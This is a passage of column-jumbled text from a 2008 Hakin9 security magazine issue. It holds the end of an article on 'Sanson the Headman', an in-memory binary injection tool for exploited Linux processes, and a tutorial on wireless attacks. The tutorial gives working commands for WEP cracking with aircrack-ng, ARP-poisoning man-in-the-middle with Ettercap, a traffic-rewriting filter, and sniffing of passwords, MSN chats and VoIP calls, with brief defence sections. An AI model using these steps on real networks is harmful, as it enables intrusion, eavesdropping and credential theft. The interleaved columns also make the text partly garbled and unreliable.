shellcode during connections segments in order to make them the exploitation of a vulnerability. Its name • SANSON _ CMD _ KILL: Exit from executable is Block and has to establish a connection Guillotine and erase the maximum of with the attacker. We will see in the next our intrusion Memory Allocation section the kind of connections that can With the library Sanson, we can allocate be built with it. Once the connection is Binary Handling and dynamically free a memory zone on made, Block downloads the fourth module, The execution of a binary on the remote the exploited process, either with the system Guillotine and stores it inside the memory target is made in two steps. Firstly, calls mmap/munmap or malloc/free. space of the exploited process. Block Headman sends a packet that contains The segments allocated are important then gives the execution to Guillotine. This the desired binary and a loader (this because they will contains our ELF binaries. one will communicate with Headman module is detailed below). Then, each In fact, they can be seen as a proof of with a protocol described bellow. The time you want to run the binary, Headman our attack. That’s why the protection of main purpose of Guillotine is to receive sends a request of execution that come these segments is essential. It can be the binaries and to execute them in the with the necessary arguments and achieved by locking the memory pages memory space of the current process. environment variables. Therefore, it is with the system call mlock in order to pretty easy to launch the same executable avoid a swap on the hard drive. However, Description of Implemented many times without wasting network this function is limited by the ressource Techniques – Connection Mode bandwith, thus reducing the risk of being RLIMIT_MEMLOCK, which is by default Sanson The Headman provides different detected. fairly low (usually 32 Kbytes), and can only method of communication between the The loader, called Leon in the project, is be increased inside a process which has attacker and the target, depending of written in assembly language and contains system privileges (precisely the capacity the context and the need of discretion. a table of actions that will be done on the CAP_SYS_RESOURCE). The first one is the connect back. In remote target when Guillotine receives a this case, Headman listen for a new complete binary packet. These actions, Demonstration connection which will be initiated by the which can be modified by the attacker, will The following examples show a classical shellcode Block. This can be useful to prepare the memory space of the exploited use of Sanson The Headman. We include bypass a firewall that stops new incoming process to support the new ELF binary. plenty of debug logs to be able to see what connections on the network and allows The main possible actions are: is going on. only outgoing connections. The two other modes concern the initialization of the • LEON _ ACTION _ MUNMAP – unmapping Headman connection by Headman. In this case, of some segments of the current On the first excerpt, Headman (the user Block has to listen for incoming requests, process (usually the .data and .code interface) is used by the attacker to create either by reusing the socket that has been segments) a new session and connect to the remote opened during the exploitation of the • LEON _ ACTION _ MMAP – mapping of compromised server, which should be at vulnerability or by opening a new one. The the segments of the new ELF binary the step of running Guillotine. Once we reuse of the socket is the more discreet • LEON _ ACTION _ MALLOC – allocation are connected, we send two ELF binaries method because the connection is seen of the desired memory space which are pretty useful: nmap and busybox. as legitimate by the firewall.�� Definition of a New Protocol Once Headman and Guillotine know each other, they can exchange information with �� the help of a simple protocol. Here are the main messages:�� • SANSON _ CMD _ SEND: Sending of a �� packet to the target (header + binary + �� librairies) �� • SANSON _ CMD _ DEL: Removing of a packet on the target • SANSON _ CMD _ EXEC: Execution of a specified binary Figure 1. A modular tool42 HAKIN9 4/2008ATTACK MEMORY EXECUTION UNDER LINUXThey have been previously compiled Listing 7. Receive and execute a binary (Guillotine side) statically to prevent dependencies. Now, we can execute them. Firstly, we launch $ ./guillotine32 nmap to scan all the common ports of LOCATE_STACK_BRUTEFORCE @ 0xbfede000 LLOC_MALLOC 8 @ 0x80d7688 a system present on the local network of Waiting new connection [8161] .... the exploited computer. Then, we use the RECV 64 busybox to do some stuff (like watching the CMD LIST : LIST SEND 100 content of some files) with the privileges of Waiting new connection [8161] .... the exploited process. Finally, we properly RECV 64 close the connection (see Listing 6). CMD SEND : SEND nmap RECV 84 [+] NAME : nmap Guillotine [+] TOTAL SIZE 5954411 You can see in the server part (Listing [+] TYPE 0 7), what is received and how memory [+] COMPRESS 0 [+] CRYPT 0 allocation is done. [+] SIZE 5954327 This is a scenario of the first version of [+] NB -1 Sanson the Headman. Of course, keep an ALLOC_MMAP 5954327 @ 0xb7a49000 eye on the website for further releases [7]. RECV 5954327 ALLOC_MMAP 100 @ 0xb7a48000 Defense Waiting new connection [8161] .... In this section, we will not talk about security RECV 64 solution like grsecurity or Pax. Even though CMD EXEC : EXEC nmap RECV 128 this protection seems attractive, they are EXEC nmap with -sT 10.0.0.42 not really deployed currently. And most of ALLOC_MMAP 264 @ 0xb7a47000 all, they are more specialized to protect ALLOC_MMAP 264 @ 0xb7a46000 ALLOC_MMAP 264 @ 0xb7a45000 against arbitrary code execution, whereas ALLOC_MMAP 264 @ 0xb7a44000 the techniques presented are used when Waiting new connection [8161] .... the execution flow is in our hands. We could RECV 64 also consider to monitor all the system calls CMD SEND : SEND busybox RECV 84 with a systrace-like tool, but this solution is [+] NAME : busybox more related to the domain of Behavioral [+] TOTAL SIZE 1181996 Intrusion Detection System, and thus going [+] TYPE 0 beyond this article. Here, we would rather [+] COMPRESS 0 [+] CRYPT 0 talk about memory investigation. [+] SIZE 1181912 At the present time, there are a lack of [+] NB -1 tools dedicated in post-mortem memory ALLOC_MMAP 1181912 @ 0xb7927000 RECV 1181912 analysis. However, some solutions seem ALLOC_MMAP 100 @ 0xb7926000 to respond at least partly to our needs. Let TYPE 2 us see what we have in store. The most evident method is to dump the volatile Waiting new connection [8161] .... RECV 64 memory while the system is in production. CMD LIST : LIST We have to take care that the memory PAQUET @ 0xb7a48000 image stays uncorrupted and remains PAQUET @ 0xb7926000 SEND 100 stable. Indeed, a treacherous rootkit could SEND 100 spoil this acquisition if it runs at a better SEND 100 or equivalent privilege mode. We can also Waiting new connection [8161] .... consider to make a dump of each process, RECV 64 CMD EXEC : EXEC busybox as does the software Process Dumper RECV 128 developed by Ilo [8]. Furthermore, this tool EXEC busybox with busybox cat /proc/cpuinfo provides the capacity to execute again ALLOC_MMAP 264 @ 0xb7925000 a saved process. This feature is really ALLOC_MMAP 264 @ 0xb7924000 ALLOC_MMAP 264 @ 0xb7923000 useful during an investigation because we ALLOC_MMAP 264 @ 0xb7922000 can analyze the incriminated process at Waiting new connection [8161] .... runtime as many times as we want. RECV 64 CMD EXIT : EXIT Process Dumper attaches itself to a process with the help of the system call ptrace 44 HAKIN9 4/2008 4/2008 HAKIN9 45 ATTACK MEMORY EXECUTION UNDER LINUX and dumps the segments PT_LOAD of an call ptrace (which can be countered by image acquired by this way is not reliable, executable in memory (more precisely, the the attacker with a ptrace-protection: http: because a rootkit has the possibility to alter .code and .data sections). Then, it makes //actes.sstic.org/SSTIC06/Playing_with_ the information dumped. Besides, the PCI some modifications of the GOT table if we ptrace/), but directly by interfacing with the peripherals are fairly expensive and difficult want to run a dynamically compiled binary. kernel and accessing its structures or even to obtain, according to Joanna. Let's see an example of the use of by using the information contained in /proc. Last but not least, virtualization can offer Process Dumper. The goal here is to dump With Kernsh, even though we are able to an elegant way to obtain a clean dump of a simple process called hakin9. The source dump a precise process at a lower level the memory of either a process or the entire code of the binary is located in hackin9.c than Process Dumper does, its limit will be system. The idea is to run the server inside and compiled with gcc. Then, we execute the same as discussed above. a virtual machine with tools like Xen, UML, this binary (the sleep function makes it Nevertheless, as a software KVM, Qemu or VMware. The dump would be alive for 500 secondes). Now is the time to mechanism, these techniques can be done at the host level and the integrity would run Process Dumper on our new process. bypassed by an advanced rootkit running be achieved because of the isolation of the Two arguments are needed: the dump file at the same level of privileges. different virtual machines. that will be generated and the PID of the Thus, we can use an hardware For example, with Qemu, it is possible program we want to dump (here, 9830). So, approach in order to get a faithful copy to save the current memory state with the command looks like: ./pd -o dump _ of the memory. For instance, some the command savevm. Then, further file pid _ number. When this operation PCI or Firewire peripherals can retrieve investigations can be done endlessly by is done, we can reload the process by just the physical memory of a system by charging this dump with the command running the dump file: ./dump.file. using Direct Memory Access (DMA), loadvm. The same commands are available which means that a read/write of the in all the main virtualization solutions.[frame=single,language=sh,basic memory is directly done with the Memory style=0]log\sdo5(p)rocess\ Management Unit (MMU) without any Conclusion sdo5(d)umper.txt intervention of the processor nor the In this article, we have talked about operating system. The memory image the main techniques for the memory The main disadventage of Process collected should then be reliable. injection. Until now, there were not any Dumper is that the dump has to be done Recently, Adam Boileau has released good and easy solutions to detect these on the exploited computer. Thus, the image a tool that can unlock Windows [10]. It is not kind of attacks. In consequence, security acquired could be not reliable, depending a new method because it has been known managers and administrators seem to of the state of compromise. since 2006 and it is a feature of Firewire. We be devoid of efficient tools. However, we Another solution, a bit more low-level, can access the system memory by using the are confident in the fact that the IT world is is to use a kernel module that handles physical-memory-DMA. It is working on some taking more and more consideration as to the dump of the memory (or for example OS and on Linux too. Like this, it is possible to the importance of the volatile memory. by using /dev/kmem). An existing tool is dump the memory to an external device. Finaly, you are probably wondering Kernsh from the project ERESI [9]. It used However, this hardware approach why are we creating this software? Is it a a kernel module that allows access to the can be defeated, as shown by Joanna solution to produce an attacker tool? And kernel memory as well as to the memory Rutkowska in 2007 [11]. The idea is we will answer that if no one creates any pages of the processes. Thereby, we can to reprogram the Northbridge of the public tool, it will take a long time to obtain collect the mapping of the incriminated motherboard in order to reroute some an efficient countermeasure. Just to remind process without the need of the system memory addresses. Therefore, the memory you, a new public feature is not necessary a new technique. It is certain that similar tools (not public) are used today in the real On the 'Net world.• [1] Chaos Computer Camp 2005. http://events.ccc.de/congress/2005/fahrplan/attachments/ We hope that you enjoyed this 707-slides_syscall_proxy.pdf adventure in this fantastic world of the • [2] Uberwall. http://uberwall.org/ memory! • [3] Full disclosure mailing list: grugq. http://techlists.org/archives/security/fulldisclosure/2004- 01/msg00001.shtml Anthony Desnos • [4] Pitbull. http://7a69ezine.org/docs/7a69-PUP.txt Anthony Desnos is currently in Computer Security Master Degree. He is a member of ERESI Team (kernel's part) • [5] Rexec. http://phrack.org/issues.html? issue=62&id=8 and Kernsh Labs. • [6] Self. http://phrack.org/issues.html? issue=63&id=11 • [7] Sanson the Headman. http://sanson.kernsh.org Frédéric Guihéry • [8] Process Dumper. http://phrack.org/issues.html? issue=63&id=12 Frédéric Guihéry is currently in Computer Security Master Degree. He is a member of Kernsh Labs. • [9] The kernel shell: Kernsh. http://www.eresi-project.org/wiki/TheKernelShell • [10] Firewire, DMA & Windows. http://storm.net.nz/projects/16 Mickaël Salaün • [11] Beyond the CPU: Defeating hardware based RAM acquisition tools. http:// Mickaël Salaün currently in Computer Security Master invisiblethings.org/papers.html Degree, and he is a member of Kernsh Labs. contact@sanson.kernsh.org44 HAKIN9 4/2008 4/2008 HAKIN9 45 ATTACKSTEPHEN ARGENT The Real Dangers of Wireless NetworksDifficultyMost of us have read exactly how easy it is to gain access to Wireless Networks – but once you have access, did you really realise how easy it was to have passwords to any internet traffic, or how easy it was to manipulate and sniff this traffic? his article will show you the ease behind access to everything that happens on that network. using Ettercap to perform a MiTM attack, I will explain with practical examples how this is T as well as using various programs to sniff done, how you can do it on your home network, the actual traffic that is passing through you, after as well as how to prevent this sort of attack from performing a basic WEP attack. happening. Shall we proceed? In a previous article, I have shown you how easy it was to crack the passwords of wireless networks, So What Is ARP? and how to gain access to the internet through these ARP stands for the Address Resolution Protocol, networks once connected, but the danger from this and is used to find the networks hosts Physical is only a simple one – it is possible for people to do Addresses (MAC addresses) when only the bad things from your connection. Although this can network layer address is available. sometimes result with the police knocking on your The network layer is the third layer in the OSI door, it is usually fairly easy to prove your innocence, model, and responds to transport layer requests and as such, is not a huge issue. However, there is a (4th layer) and hands out service requests to darker side to wireless networks. the data link layer (2nd layer). Network layers are Have you ever thought that just by using a responsible for the transfer of packets from the WHAT YOU WILL wireless hotspot you can have your entire digital source up to the destination, and provide quality of LEARN... identity stolen from you? Emails read, MSN service along the way. Network layers are said to Simple way to break into conversations read, passwords for any and be both connection-oriented and connectionless, Wireless Networks every website you visit – including online banking as there are situations of both scenarios, when How to use Ettercap, Driftnet, and Wireshark for sniffing – stolen, VOIP conversations listened in on – it is all the end user has to accept the connection in a How to manipulate packets in a as easy as being connected to the same network, connection-oriented situation, or the connection is basic way which is as easy as cracking the password. simply made in a connectionless situation. Within How to view MSN conversations Perhaps you have a neighbour who you have never the network layer there are many different protocols, over the network got along with, and he/she decides to get revenge such as IPv4/IPv6, which includes things like ICMP – having a wireless network makes this so much (Internet Control Message Protocol) and DVMRP WHAT YOU SHOULD KNOW... easier. In this article, I am going to introduce you (Distance Vector Multicast <a href="/tags/Routing_protocol/" rel="tag">Routing Protocol</a>), as well to a concept called ARP Poisoning, mainly over as things like IPSec (Internet Protocol Security), and How to boot from CD wireless networks, although the same principle IPX (Internetwork Packet Exchange). The basics of network protocols (mainly HTTP, HTTPS, and works for wired networks. This is a form of Man in ARP is not limited to resolving the hardware MSNMS) the Middle attack, which means that you redirect all address from IP addresses only, but can be (and How to use the terminal the networks traffic through you, thereby giving you is) used with any protocol from the network layer. 46 HAKIN9 4/2008 THE REAL DANGERS OF WIRELESS NETWORKSHowever, because of the popularity and is known as the Man in the Middle. This gateway 10.1.1.1 has a MAC address of 0E: density of IP based Ethernet connections, means that an attacker can use this on a 33:FB:G3:G2:11, 10.1.1.2 has a MAC of 00: ARP is usually used to resolve an IP network (Ethernet or wireless) to redirect 02:FE:G1:1B:CC, and 10.1.1.3 has a MAC of address to the Hardware (MAC) address, all traffic through them passively, which will 00:11:22:33:44:55. If 10.1.1.2 was performing however, it is not restricted to IP over allow client's normal internet service, with the the attack, it would send out ARP messages Ethernet, and is used in things like Token hidden exception of passing all data through indicating that 10.1.1.1 and 10.1.1.3 was on Rings and Wireless Networks. ARP is used the attacker first and thereby divulging all such MAC 00:02:FE:G1:1B:CC, and therefore all generally in four different situations: secrets to that attacker. The attacker also has traffic destined for either IP address would be the opportunity to either modify the packets sent to that physical MAC address as that • Two PC’s on the same network as they pass through in order the change the traffic is transported over the network layer. At • Two PC’s on different networks using a information, or simply stop any traffic, which this stage, it is up to the attacker on 10.1.1.2 router to connect is known as a DoS (Denial of Service). The whether he forwards 10.1.1.3’s traffic on to • When a router sends a packet through basic aim of ARP poisoning is to create fake 10.1.1.1, or whether he prevents it from getting another router to a host ARP messages which will map the other IP’s there, or alters it on the way. A Denial of • When a router send a packet on the to the attackers MAC address in the cache’s Service could also be performed by sending same network to a host of the client. For example, lets assume the an ARP message informing the clients that The first situation is used simply for LAN, and the last three generally for WAN (Internet mainly). ARP has two main formats; request and reply. A request is used for example when a host, such as 10.1.1.2 with a MAC of 00:11:22:33:44:55, needs to send a packet on to a newly connected client 10.1.1.3, the MAC of which is as yet unknown. 10.1.1.2 will then send an ARP request to find out this information. A reply would then be issued to 10.1.1.2 containing 10.1.1.3’s MAC address. The request containing 10.1.1.2’s IP and MAC is available for all on the network to view, and therefore cache the information; however, the reply is only available to the requestee. There are also ARP probes, which are used when a client joins a network. Once joined, it must broadcast an ARP probe to determine if it is IP address is already in use or not. ARP is used because computers on an Figure 1. The Cracked WEP Key Ethernet network can only communicate with each other once they know the MAC address of the client they are trying to communicate with. ARP is cached in a table which maps the connections between an IP address and their related MAC address. A simple program which can be used to view this (on Windows) is PacketCreator 2.1, under the ARP tab. Linux has a more advanced program for this – Arpwatch (ftp: //ftp.ee.lbl.gov/arpwatch.tar.gz). This program generates and records logs of each IP and it is make and the time it was assigned, in order to detect ARP Poisoning, and will send an email upon detection of ARP poisoning.So What Is ARP Poisoning? ARP poisoning is also known as ARP spoofing, and is used to become what Figure 2. The BackTrack Desktop4/2008 HAKIN9 47 ATTACK a new (but non-existent) MAC address has • How to write and use filters in Ettercap Wireshark. At the time of writing this article, been assigned to the default gateway. with examples, such as replacing all only BackTrack 3 Beta is available, however, images in a web page, or replacing all by the time this article reaches the shelves, The Attack? web pages with another one BackTrack 3 final will probably be available. The attack is obviously the critical focus of this • Explanation of how MiTM can be used BT3 Final will probably have a slightly article, and as such I will cover as much as I to gain further access into the network different GUI, but all the processes should can within the space and time constraints of be the same, and you should not need this article. ARP based attacks can be quite Of course, for all of these we will be using to do anything differently. Basically, head dangerous to the people on the network (in Open Source and freely available tools, all over to http://remote-exploit.org/ and grab terms of personal privacy etc.), so the tools of which are located on the BackTrack CD yourself a copy of BackTrack. I am going and techniques mentioned here can only and will only require minimal configuration. to assume you are all familiar with the be used in the confines of your own home/ I will now proceed to explain how to set up process, so grab your favourite burner, burn authorised work domain (as with all security your environment for the attacks. the ISO, and boot from the CD, selecting related things). We will cover such things as: the default option from the CD's Boot Menu. Setup • Brief technique for breaking into a WEP For this tutorial, we will be using BackTrack, Ettercap Configuration encrypted Wireless Network a Linux live-CD with a security focus (a Once your desktop KDE session is loaded, • How to sniff passwords over the customised version of which is located we will be using Ettercap to perform the network by being the MiTM on the Hakin9 CD as Hakin9.live), which MiTM attack, but to do so, we will have to set • How to view/decipher MSN includes the tools that will be using: up Ettercap to use IPTables to forward traffic. conversations by being the MiTM Aircrack-NG suite, Ettercap, Driftnet and To do so, open up a terminal session and type the following (everything after the #) bt ~ # echo 1 > /proc/sys/net/ipv4/ip_forwardThis enables IP forwarding. Then, type the following: bt ~ # kedit /usr/local/etc/etter.confThis will open up a new window within which is a text file that holds all the configuration settings for Ettercap. Look for the following lines in the file, and uncomment them by removing the hashes (except for the one next to if, then save it and close it: see Listing 1. We are now ready to proceed to the attack stage. Figure 3. Ettercap Configuration File The Wireless Attack – Gaining Access to the Network As this article is on the real dangers of wireless networks, we will be starting off this attack with the cracking of a WEP key, and then association with that network, in order to perform the rest of the attack. I have already covered this section of the article extensively in the January 2008 edition of Hakin9, so you can read it in more detail there. So as such, I will only explain it briefly here. Open up a console session and enter the following command:Figure 4. Airodump Sniffing Networks bt ~ # iwconfig48 HAKIN9 4/2008ATTACK THE REAL DANGERS OF WIRELESS NETWORKSThis will display all your wireless adapters. If it worked, it should say Authentication perform the MiTM attack if there were not Make sure yours is showing, and take note Successful :). Then we can proceed to the clients connected. For an explanation of the of the name. For this, we will assume it is next stage of the wireless attack. There clientless attacks, refer to either the Aircrack ath0. Next, type are two ways of doing this – one is when main site (mentioned earlier), or my article in you have clients attatched to the network, the January 2008 edition of Hakin9, where bt ~ # airmon-ng stop ath0 the other is when you don't have clients I detail all attacks on both WEP and WPA bt ~ # airmon-ng start wifi0 attatched to the network. For the purpose networks. Now, we have completed the fake (make sure this is wifi0) of this article, I am going to assume that assosciation with the Access Point, which bt ~ # airodump-ng –w output –c 1 ath0 you do have clients connected to the means that ARP requests will be broadcast (assuming network is on channel 1) network, as you would not be able to (as is always the case with networks), and The airodump command starts a capture Listing 1. Ettercap IPTables Setup process with a program called airodump which captures things called “IV's”. I won't # if you use iptables: go into the whole theory of that here, but #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j suffice to say these are the things we want REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j lots of captured. Here, we have specified REDIRECT --to-port %rport" the channel to capture the packets from, Listing 2. Connecting to Wi-Fi Network however, if you do not know what channel it is on, then try airodump without the -c 1 bt ~ # wlanconfig ath0 destroy option, figure out what channel the network bt ~ # wlanconfig ath0 create wlandev wifi0 wlanmode managed is on, then press [Ctrl]+[C] to break, and bt ~ # ifconfig ath0 up try airodump again with the -c 1 option (or bt ~ # iwconfig ath0 essid WIFINETWORK key 11:22:33:44:55:66:77:88:99:88:77:66:55 bt ~ # dhcpcd ath0 whatever channel your AP is on). Airodump shows us many useful things, such as the MAC addresses of all access points and stations, their ESSID's, the #Data captured (which is the one we want to get lots of), and various other things. We will need to take note of most of these options. We now need to do a fake authentication with the access point in order to make it think we are part of the network. However, first, we need to find out the MAC address of our PC in order to direct some of the network traffic towards us. Open up a new console session, and type: bt ~ # macchanger ath0 (assuming that your interface is ath0). This will display the MAC address that you are currently using. Take note of this and write it down somewhere, as we will be using this many times before the attack is over. In this same window, we will be typing the next command. To do a fake association, type the following: bt ~ # aireplay-ng -1 0 -e WIFINETWORK -a XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX: XX:XX ath0Where WIFINETWORK is the ESSID of the network, the -a option specifies the Access Point MAC address (the BSSID in the airodump window), and the -h option specifies your PC's MAC address (found in the macchanger window we used earlier). Figure 5. Ettercap In Action50 HAKIN9 4/2008 4/2008 HAKIN9 51 ATTACK THE REAL DANGERS OF WIRELESS NETWORKS we will receive any of these broadcasts as the WEP as more packets are captured. key (I.e., how much percentage chance there explained earlier in this article. This can be run at the same time that the is of it being the right key). The last step in The next step we take will listen for capture is taking place, so both can be run connecting to the network is using this key to these ARP packets on the network, which indefinitely until the key is cracked, or until you actually connect to the network. This is done it will capture and re-inject as ARP request run out of memory (because this runs from using the following commands: see Listing 2. packets, which will generate a lot of packets, the live CD, this uses your RAM to capture Assuming that WIFINETWORK is the and in turn, a lot of #Data or IV's, which are these packets). Because we have used the ESSID of the network you are trying to the things we want. In the airodump window, capture method involving ARP packets, we connect to, and the all the numbers after key take note of the MAC addresses of the can use Aircrack's faster -z option which are those of the WEP key you are using to clients, as we will be using them. Open up a is known only as the PTW method (http:// connect (in this case, 128-bit). You are now new console and type: www.cdc.informatik.tu-darmstadt.de/aircrack- a part of the network that you are about to ptw/). If this does not work however, simply perform the MiTM on. Seeing as you will be bt ~ # aireplay-ng -3 -b XX:XX:XX:XX: exclude the -z option from the command trying this on your home network, you should XX:XX -h XX:XX:XX:XX:XX:XX ath0 line. Open up a new console and type: already know the other IP's on the network. Ping one of them just to make sure that Where -b is the Access Point's MAC bt ~ # aircrack-ng -z output*.cap everything has worked and you are actually address, or BSSID (as mentioned earlier), associated within the network. If so, we can and -h is our MAC address again, -3 is the Assuming that you used the -w output move onto the next step – the actual MiTM ARP-Request-Replay method, where ARP option in airodump. If you did not, simply attack. requests are captured and rebroadcast for substitute output*.cap for whatever you traffic creation, and ath0 is still the interface. used. I.e, if you used homenet, then it would Becoming the MiTM Now that we have started this, we will now be homenet*.cap. After a while, the cracked Now that Ettercap is set up, becoming the start the cracking program Aircrack-ng in WEP key will be displayed, along with the MiTM is a relatively simple process for the the background, which will attempt to crack percentage estimation of accuracy of this most basic attack. This attack will simply make us the MiTM, and allow us to view passwords that are transferred through the network to such protocols HTTP, SSH plaintext, FTP, TELNET, POP3, etc. Open up another terminal session, and type the following: bt ~ # <a href="/tags/Sudo/" rel="tag">sudo</a> ettercap -Tq -M arp:remote /$IP/ -P autoaddAnd replace $IP with an IP Address range of your network which includes the default gateway and a few clients. Such as, for example, a network which includes a router to the internet which is the default gateway (10.1.1.1), and four clients including yourself (10.1.1.2-5). The easiest way would be simply to put the IP range as 10.1.1.1-5, and Ettercap will add in any additional clients that join the network. The -p autoadd switch is optional, and probably is not advised on larger networks for risk of DoS'ing (Denial of Service) the clients, as it automatically adds in any extra clients by detecting the ARP requests that are sent back and forth, and determining which clients exists and which do not, and adding any that do exist. At this point, Ettercap will scan through the IP Addresses that you have specified, figure out which MAC address they are on, and then send out the fake ARP packets as described earlier, pinpointing each IP Figure 6. Driftnet in Use address to the single MAC address of your 50 HAKIN9 4/2008 4/2008 HAKIN9 51 ATTACK THE REAL DANGERS OF WIRELESS NETWORKSPC, passing absolutely all traffic through it. own pre-made packets. Building your own command to turn the code into a filter that This enables us to watch everything that filter requires a basic knowledge of how is readable by Ettercap: happens, as well as modify any packets programming languages work, or the ability that come through, but we will cover that in to analyse and determine how the Ettercap bt ~ # etterfilter filter.pic -o filter.ef a little while. First, you will notice in the same filters work, which is relatively simple if you window that nothing much is happening are used to analysing data/packet streams You will see a few things happen, and then – that is because no plain text passwords with programs such as Wireshark. Open a the filter will be created. Basically, the code are being passed through the network. In new console, and type: is fairly simple. The if (ip.proto == TCP order to determine if your attack has worked, && tcp.dst/src == 80) basically tells go to another PC on the same network, bt ~ # kedit filter.pic Ettercap to only pay attention to the TCP and try to login to something like a forum, protocol packets on either the destination to or your hotmail account, or similar. Anything Then copy and paste the following into the port 80, or the source from port 80 (which that does not have an https should work. window that comes up: see Listing 3. is all web related traffic), and then to follow You will notice that whenever you try to login Save this, and then close Kedit. In that the instructions that come after that – ie. to to a website when a MiTM attack is being same console session, run the following search that packet for a string, then replace performed, it will ask you whether you want to accept a certificate. The attack works Listing 3. Image Replacement Packet Filter Source on the basis that most people will simply accept the certificate, thinking nothing more if (ip.proto == TCP && tcp.dst == 80) { of it, and most people will. So when you are if (search(DATA.data, "Accept-Encoding")) { testing if your attack worked, simply accept replace("Accept-Encoding", "Accept-Rubbish!"); msg("Modified Accept-Encoding!\n"); the certificate and watch your magic go to } work. If you are ever using another PC on a } public network, and you see such a prompt, if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/ be very cautious as to whether you accept it hacked28hi.png\" "); or not. Examine it and see who it was signed replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/ by, etc., in order to determine if the certificate hacked28hi.png\" "); is legitimate or not. At this point, you could msg("Replaced the picture.\n"); } simply sit back and watch the passwords if (ip.proto == UDP && udp.src == 80) { be collected, or start up driftnet to view all replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/ the pictures being viewed over the network: hacked28hi.png\" "); replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/ hacked28hi.png\" "); bt ~ # cd /usr/local/driftnet-0.1.6/ msg("Replaced the picture.\n"); && driftnet -i eth0 }When quitting Ettercap, make sure to press the letter q instead of the typical [Ctrl]+[C], because that will Re-ARP all the clients. If you simply press [Ctrl]+[C], then there will be a massive DoS, and no clients will have the internet or network access until they refresh their network position. You can also press p whilst Ettercap is sniffing, allowing you to activate further built-in plugins. Now we can move onto some more interesting propositions: manipulating the packets.Manipulating the Packets The possibilities of packet manipulation are endless, bound only by your creativity, and the time you are willing to spend exploring the different protocols and how they work and their relationship with inbound traffic and outbound traffic on the network. Ettercap comes with its own built-in filter creator, as well as a few of its Figure 7. Image Replacement in Action52 HAKIN9 4/2008 4/2008 HAKIN9 53 ATTACK THE REAL DANGERS OF WIRELESS NETWORKS it with what you would like that string to read. replaced by watching the output of your Information Gathering You will also notice that in replacing the console session. The filter we created won't This section demonstrates how easy it is strings, we must keep the length of the two work with absolutely every website because to read and gather information by using strings the same – be careful to make sure of the many various ways of including the MiTM attack. Imagine if your neighbour you do this, or it won't work. To make this images, but it will work with many of them. read exactly what you sent through your filter run during your MiTM attack, we must Applying this same principal you MSN logs, who to, and when. If you gave use a slightly altered Ettercap command. can, for example, figure out the port of them long enough, they could figure out The command to use is (assuming you a Messenger program, and modify the roughly how you speak, and then even saved the filter in the /root folder): outgoing packets to include words of your log in as you and impersonate you to get own – for example replacing something more information. Assuming you are still bt ~ # sudo ettercap -T -q -F filter.ef like How are you with something like I the MiTM as in previous steps, open up -M arp:remote /$IP/ -P autoadd hate you! (notice still the same amount of Wireshark, and start capturing. This is done characters – this is essential in general by going to KDE Menu>BackTrack>Privelege Now move to another computer, and packet manipulation, however, is not Escalation>Wireshark, then click navigate to a website, and see a lot of necessary in our image filter, as we are Capture >Interfaces, and click +Start on the pictures being replaced with the image adding to what is already there [via the use interface you want to capture the traffic on you specified! This can be quite funny. of the slashes], not modifying). Explore, and (in our case – ath0), and then wait around Alternatively, you can see the images being have fun with this. for a while as it captures information. If you are testing this in your own lab, go to your other PC and open up MSN, sign in, and start talking to someone (all whilst Wireshark is capturing data). Once you have chatted to a few people for a while, enter in the filter section (near the top of the Wireshark window) msnms making sure it is in lower case, then click Apply. You will notice a number of packets, most of which are useless, but if we look closely, we can eliminate a few of these. The ones you would want to take notice of are the ones with the MSG in front of them in the Info section. If it helps, you can click on one of the MSG packets, and then click Analyze >Follow TCP Streams, where you can then scroll through all the conversations and read what you need to, or print it out and highlight the Figure 8. Wireshark Capturing MSN Packets actual conversation. Another somewhat easier to use, program that can be used is one called Imsniff, available on sourceforge, this program is still buggy and in Beta. To use this program, simply download and extract the .tgz file, then in the terminal, cd into the linux directory, and run build by using ./ build in the terminal. This will build Imsniff according to your network devices. Then run: imsniff -cd /root/chatlogs eth0The reason we run Imsniff on eth0 is because it is designed for eth0 by default, but the README in the /docs/ folder describes how to modify it for wireless connections. You can also use the imsniff.conf.sample file to make your Figure 9. AutoScan – A network Defence own auto configuration folder for this. The 52 HAKIN9 4/2008 4/2008 HAKIN9 53 ATTACK only bug I have encountered so far is that this to exploit your PC? If they scanned your instead of the easy-to-break WEP. A good sometimes it wo not create the folders for computer with Nmap, and figured out what idea would be to either set up WPA with a each MSN account you are sniffing, and as services and versions you were running, password that is 63 characters long, and such – no logs are recorded. To combat they could then figure out if you had anything a non-dictionary word (making it close this, simply create a folder within your exploitable and create a webpage (that is to impossible to crack), or to set up WPA specified folder for that MSN contact, and locally hosted) through Metasploit, and then Encryption with Radius server authentication then logs will be created within there. get Ettercap to redirect all traffic to the page (beyond the scope of this article, and most Another handy trick that you can do with – whereupon they will be exploited and you home situations, but worth looking into for Wireshark is capture any SIP phone calls will have Root control of their system. You can businesses). Another such method is DHCP that pass through that network. Again, start imagine how detrimental this could be. Snooping. DHCP Snooping ensures that a capture process, then wait for a SIP call One further possibility is possible further only clients requesting an IP over DHCP to be made and completed, then stop the access into the network. Imagine this – a are connected if their IP and MAC address capturing. Now, simply go to Statistics >VoIP client computer is authenticated with the match those specified within the whitelist of Calls, and from here it will list all calls made, server based on it is network address or allowable clients. DHCP Snooping works in duration, starting time, etc., and you can fingerprint. This network address is then one of 3 ways: then play and listen to these calls from here. stolen by you with your MiTM attack, thus Imagine what your neighbour might hear if making you appear as that client to the • By tracking the physical location of the they were using your wireless. server. The server would then give you the hosts priveleges of that client where you normally • Making sure that the hosts are only Further Possibilities would not have privileges – another large using the IP addresses given to them Evidently, being a MiTM, there can be security threat for administrators. These are • Ensuring that clients can only access endless possibilities as to the things you just a few further ideas for possibilities that the DHCP servers that are authorised can do. If you can read all packets and can be achieved through Ettercap – you are on that network. manipulate all packets – then what's to stop only limited by your imagination, so have a you controlling the network? There are a few play around and figure some things out. DHCP Snooping ensures that any more basics that we haven't covered in this additional and unauthorised DHCP servers article, and that would be better left for you The Defence are inoperable. There are also certain to explore yourself. One of these possibilities As you have seen, the attacks on ARP network Switches (such as those by Cisco) is sniffing SSL (Secure Socket Layer) traffic, can be quite powerful and have rather that impose additional security called ARP such as secure logins for sites like Hotmail dangerous results. On a small scale, Security or Dynamic 